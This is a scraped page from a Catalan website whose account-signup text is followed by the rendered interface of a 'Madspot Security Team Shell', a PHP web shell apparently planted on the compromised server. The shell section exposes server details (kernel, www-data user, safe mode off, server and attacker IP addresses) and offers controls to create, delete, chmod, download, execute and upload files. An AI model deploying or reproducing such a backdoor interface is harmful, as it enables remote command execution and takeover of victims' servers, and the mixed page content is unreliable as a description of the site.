E.g., 01/07/2015

Compte d'usuari

Què pots fer si et registres

ComentarPodràs comentar els blogs i articles.

ParticiparParticipar als concursos.

EsdevenimentsPersonalitzar la teva pròpia agenda i guardar els teus continguts preferits.

ButlletinsRebre el butlletí de la teva edició preferida.

ajudaSi tens dubtes, visita la pàgina d'ajuda.

Madspot Security Team Shell
Uname: Linux surtdecasa 3.2.0-53-generic #81-Ubuntu SMP Thu Aug 22 21:01:03 UTC 2013 x86_64
User: 33 [ www-data ] Group: 33 [ www-data ]
PHP: 5.3.10-1ubuntu3.11 Safe Mode:OFF
Our IP: 185.13.76.70 Server IP: 54.166.87.123
WEBS: CANT READ |Windows|
HDD: 1 B Free: B [0%]
Window:
Downloader: -------------
Disabled functions:pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
cURL: OFF MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF       MADSPOT.NET
Open_basedir: NONE Safe_mode_exec_dir: NONE Safe_mode_include_dir: NONE
Server Apache/2.2.22 (Ubuntu)
PWD: |CURRENT|

| Access Denied! |

__MK FILE__
__MK DIR__
__DELETE__
__CHMOD__
__CHANGE DIR__
__HTTP DOWNLOAD__
__EXECUTE__
Upload file: